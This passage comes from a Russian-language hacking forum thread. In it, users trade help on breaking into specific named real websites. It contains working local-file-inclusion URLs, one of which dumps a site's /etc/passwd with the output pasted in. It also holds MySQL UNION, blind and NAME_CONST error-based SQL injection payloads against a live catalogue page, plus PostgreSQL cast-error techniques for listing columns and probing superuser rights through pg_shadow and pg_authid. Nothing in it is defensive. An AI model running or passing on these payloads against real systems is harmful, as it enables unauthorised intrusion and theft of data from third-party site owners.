можно еще 0x0a, 0x0c, 0x0b, 0x09 или любой символ неиспользуемый мускулом. если версия => 5 то смотри в schema_name из таблицы schemata UPD: немного неправильно понял, вообщем таким образом можно узнать полный список баз )
у меня невыйшло проинклудить,может кто круче шарит и сможет расскрутить багу? http://www.e-quilibres.net/pages/page.php?rub=gen&p=/tmp/sess_5ulcekq6qo696vjsi4jn71ut57
http://www.e-quilibres.net/pages/page.php?rub=gen&p=/etc/passwd root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0perator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90OP:/: nobody:x:99:99:nobody:/:
Вот помогите мне разобраться: Как я понял, здесь отключены ошибки т.к. при вводе знак " ' ", не было ошибки. Как можно здесь раскрутить скулю? Я пробивал перед "3142" ставить " - ", тогда страница изменилась. Подскажите, что делать с этим сайтом?
Code: http://www.e-quilibres.net/pages/page.php?rub=gen&p=../adm/.htaccess&Id=185 http://www.e-quilibres.net/pages/page.php?rub=gen&p=/web/sites/vhbu/8/30/74216/public/www/.siteadmin&Id=185 http://www.e-quilibres.net/adm/ /web/sites/vhbu/8/30/74216/public/www/
Помогите раскрутить http://www.bre3zah.com/youtubes/admintest/videos/managevideos.php?x=20' варнинги сыпет, но подобрать поля или обрезать запрос не получается...
Code: http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8,9,10,11+--+ Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте?
Code: http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)=5 http://www.pinskdrev.by/catalog.php?sub_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST((version()),14)d)+as+t+JOIN+(SELECT+NAME_CONST((version()),14)e)b)a) 5.0.32-Debian_7etch5-log
Blind Code: http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)=5 PS: Забыл о выводе через name_const
2 auth_root там, походу, инъекция после лимита, да еще и с ордер баем, а при таком сочетании, насколько мне известно, инъекцию провести невозможно
PostgreSQL 8.3.7 ------------------------------------- Подскажите с конструкцией типа: select+column_name::text::boolean+from+information_schema.columns-- в ответ select+column_name::text::boolean+from+information_schema.columns+where+column_name+not+in($$typname$$)---- Я так понимаю typename и typenamespace - это названия колонок. Но как дальше перебирать конструкцией not in? При проверке же в ответ страница без ошибок и нужной мне информации если то select+column_name::text::boolean+from+information_schema.columns+limit+1+offset+0-- в этой же конструкции ни лимит ни оффсет ничего не меняет.
Так и перебирать Code: not+in($$typname$$,$$typnamespace$$,$$other_column$$) и т.д. А чем LIMIT ... OFFSET ... не нравится для перебора таблиц?
Спасибо, уже хоть что-то заработало Изменение же LIMIT ... OFFSET на вывод не влияет, как выдал он tmplname, так его и выдает
лимит менять не стоит, изменяется оффсет. Если по какой-то причине не удается получить инфу из pg_user, то попробуйте выяснить о статусе поля usesuper косвенно, например, обратившись к pg_shadow / pg_authid. Также не исключено отсутствие прав на pg_user, следовательно, usesuper = false Added. Проверил сейчас в консоли. Запросы Code: select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 2; select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 3; select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 1000; выдает один и тот же результат
так, попробуйте по-другому запрос составить Code: select column_name::text::boolean from (select column_name from information_schema.columns limit 1 offset 2)q;
